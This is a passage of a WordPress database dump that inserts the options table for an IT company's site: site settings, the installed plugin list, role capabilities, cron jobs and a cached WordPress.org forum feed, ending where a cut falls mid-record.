INSERT INTO `wpdp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1,'siteurl','https://bintara.com.my','yes'),(2,'home','https://bintara.com.my','yes'),(3,'blogname','Bintara Solutions Sdn Bhd (BINTARA)','yes'),(4,'blogdescription','Computers, Hardware, Software and IT Solutions for Business','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','faiz@bintara.com.my','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','4','yes'),(19,'default_comment_status','closed','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i A','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/blog/%year%/%monthnum%/%day%/%postname%/','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:31:{i:0;s:19:\"akismet/akismet.php\";i:1;s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";i:2;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:3;s:59:\"black-studio-tinymce-widget/black-studio-tinymce-widget.php\";i:4;s:33:\"classic-editor/classic-editor.php\";i:5;s:37:\"disable-comments/disable-comments.php\";i:6;s:53:\"disable-xml-rpc-pingback/disable-xml-rpc-pingback.php\";i:7;s:35:\"disable-xml-rpc/disable-xml-rpc.php\";i:8;s:23:\"elementor/elementor.php\";i:9;s:53:\"famethemes-demo-importer/famethemes-demo-importer.php\";i:10;s:36:\"google-sitemap-generator/sitemap.php\";i:11;s:16:\"gotmls/index.php\";i:12;s:21:\"hello-dolly/hello.php\";i:13;s:29:\"ip-geo-block/ip-geo-block.php\";i:14;s:19:\"jetpack/jetpack.php\";i:15;s:63:\"limit-login-attempts-reloaded/limit-login-attempts-reloaded.php\";i:16;s:35:\"login-recaptcha/login-nocaptcha.php\";i:17;s:23:\"loginizer/loginizer.php\";i:18;s:25:\"maxbuttons/maxbuttons.php\";i:19;s:31:\"onepress-plus/onepress-plus.php\";i:20;s:59:\"remove-xmlrpc-pingback-ping/remove-xmlrpc-pingback-ping.php\";i:21;s:38:\"swift-performance-lite/performance.php\";i:22;s:27:\"updraftplus/updraftplus.php\";i:23;s:43:\"visual-form-builder/visual-form-builder.php\";i:24;s:24:\"wordpress-seo/wp-seo.php\";i:25;s:39:\"wp-file-manager/file_folder_manager.php\";i:26;s:55:\"wp-geo-website-protection/wp-geo-website-protection.php\";i:27;s:29:\"wp-mail-smtp/wp_mail_smtp.php\";i:28;s:32:\"wp-simple-firewall/icwp-wpsf.php\";i:29;s:23:\"wp-smushit/wp-smush.php\";i:30;s:24:\"wpforms-lite/wpforms.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','8','yes'),(38,'default_email_category','0','yes'),(39,'recently_edited','a:5:{i:0;s:95:\"/home/norfaiz/public_html/bintara.com.my/wp-content/themes/onepress/assets/js/jquery.fitvids.js\";i:1;s:93:\"/home/norfaiz/public_html/bintara.com.my/wp-content/themes/onepress/assets/js/jquery.bully.js\";i:2;s:99:\"/home/norfaiz/public_html/bintara.com.my/wp-content/themes/onepress/assets/js/jquery.backstretch.js\";i:3;s:97:\"/home/norfaiz/public_html/bintara.com.my/wp-content/themes/onepress/assets/js/isotope.pkgd.min.js\";i:4;s:93:\"/home/norfaiz/public_html/bintara.com.my/wp-content/themes/onepress/assets/js/isotope.pkgd.js\";}','no'),(40,'template','onepress','yes'),(41,'stylesheet','onepress','yes'),(42,'comment_whitelist','1','yes'),(43,'blacklist_keys','','no'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','44719','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','0','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:6:{s:23:\"loginizer/loginizer.php\";s:22:\"loginizer_deactivation\";s:33:\"classic-editor/classic-editor.php\";a:2:{i:0;s:14:\"Classic_Editor\";i:1;s:9:\"uninstall\";}s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:41:\"better-wp-security/better-wp-security.php\";a:2:{i:0;s:10:\"ITSEC_Core\";i:1;s:16:\"handle_uninstall\";}s:27:\"wp-super-cache/wp-cache.php\";s:22:\"wpsupercache_uninstall\";s:55:\"wp-geo-website-protection/wp-geo-website-protection.php\";s:18:\"plgsggeo_uninstall\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','2','yes'),(84,'page_on_front','6','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'wp_page_for_privacy_policy','3','yes'),(92,'show_comments_cookies_opt_in','','yes'),(93,'initial_db_version','43764','yes'),(94,'wpdp_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:64:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:20:\"wpseo_manage_options\";b:1;s:16:\"aiosp_manage_seo\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:35:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:37:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:36:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(95,'fresh_site','0','yes'),(96,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(99,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(101,'sidebars_widgets','a:7:{s:19:\"wp_inactive_widgets\";a:9:{i:0;s:10:\"archives-2\";i:1;s:13:\"media_audio-3\";i:2;s:6:\"meta-2\";i:3;s:8:\"search-2\";i:4;s:12:\"categories-2\";i:5;s:14:\"recent-posts-2\";i:6;s:17:\"recent-comments-2\";i:7;s:12:\"vfb_widget-3\";i:8;s:10:\"nav_menu-3\";}s:9:\"sidebar-1\";a:1:{i:0;s:16:\"wpforms-widget-3\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";a:0:{}s:8:\"footer-4\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(102,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_audio','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(105,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_nav_menu','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:1:{s:8:\"nav_menu\";i:21;}}','yes'),(110,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'cron','a:28:{i:1573751436;a:1:{s:20:\"jetpack_clean_nonces\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1573751801;a:1:{s:16:\"icwp-wpsf-hourly\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1573751954;a:1:{s:18:\"ip_geo_block_cache\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}i:1573752046;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1573752298;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1573752464;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1573752751;a:1:{s:31:\"swift_performance_clear_expired\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:30:\"swift_performance_cache_expiry\";s:4:\"args\";a:0:{}s:8:\"interval\";s:4:\"1800\";}}}i:1573753863;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1573779030;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573779063;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1573779110;a:1:{s:21:\"update_network_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1573781006;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573784683;a:1:{s:26:\"wordfence_daily_autoUpdate\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573784698;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573790399;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573801472;a:1:{s:28:\"elementor/tracker/send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573805753;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573807099;a:1:{s:18:\"ai1wm_cleanup_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573815523;a:1:{s:10:\"itsec_cron\";a:1:{s:32:\"aa768a35ceed34e467f270ebdc5d82f4\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:1:{i:0;s:14:\"purge-lockouts\";}s:8:\"interval\";i:86400;}}}i:1573815735;a:2:{s:14:\"updraft_backup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:23:\"updraft_backup_database\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573815763;a:1:{s:10:\"itsec_cron\";a:1:{s:32:\"7a0fd5d064c59cf40c3df9ad0bb6e63d\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:1:{i:0;s:11:\"clear-locks\";}s:8:\"interval\";i:86400;}}}i:1573815943;a:1:{s:10:\"itsec_cron\";a:1:{s:32:\"3ec3d6914daf50bcdb5e5b065213e29b\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:1:{i:0;s:17:\"purge-log-entries\";}s:8:\"interval\";i:86400;}}}i:1573823801;a:2:{s:15:\"icwp-wpsf-daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:19:\"icwp-wpsf-all-scans\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:19:\"icwp-wpsf-per-day-1\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573828064;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1573829372;a:1:{s:13:\"sm_ping_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1574056800;a:1:{s:28:\"wpforms_email_summaries_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:30:\"wpforms_email_summaries_weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1575371988;a:1:{s:17:\"ip_geo_block_cron\";a:1:{s:32:\"a8cf63fecab3eb3edf6760bc02f258a6\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;b:0;}}}}s:7:\"version\";i:2;}','yes'),(15627,'db_upgraded','','yes'),(113,'loginizer_version','1.4.2','yes'),(114,'loginizer_options','a:6:{s:11:\"max_retries\";i:3;s:12:\"lockout_time\";i:90000;s:12:\"max_lockouts\";i:5;s:15:\"lockouts_extend\";i:86400;s:13:\"reset_retries\";i:86400;s:12:\"notify_email\";i:0;}','yes'),(115,'loginizer_last_reset','1573709627','yes'),(116,'loginizer_whitelist','a:0:{}','yes'),(117,'loginizer_blacklist','a:0:{}','yes'),(118,'loginizer_ins_time','1544489462','yes'),(119,'loginizer_promo_time','-1549855763','yes'),(121,'theme_mods_twentynineteen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1544490112;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','yes'),(54837,'core_updater.lock','1571100857','no'),(60983,'_transient_timeout_feed_d21d2a68bac70d38fb7f9a7bd3d1725e','1574176366','no'),(60984,'_transient_feed_d21d2a68bac70d38fb7f9a7bd3d1725e','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:5:\"\n\n	\n	\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:371:\"\n\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n			\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n				\n				\n\n							\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WordPress.org Forums Â» [Google XML Sitemaps] Support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/support/plugin/google-sitemap-generator/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 12 Nov 2019 15:02:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"https://bbpress.org/?v=2.6-alpha-6091\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:30:{i:0;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/support/topic/undefined-constant-ddsg_language-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"undefined constant ddsg_language\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/support/topic/undefined-constant-ddsg_language-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 31 Oct 2019 21:40:14 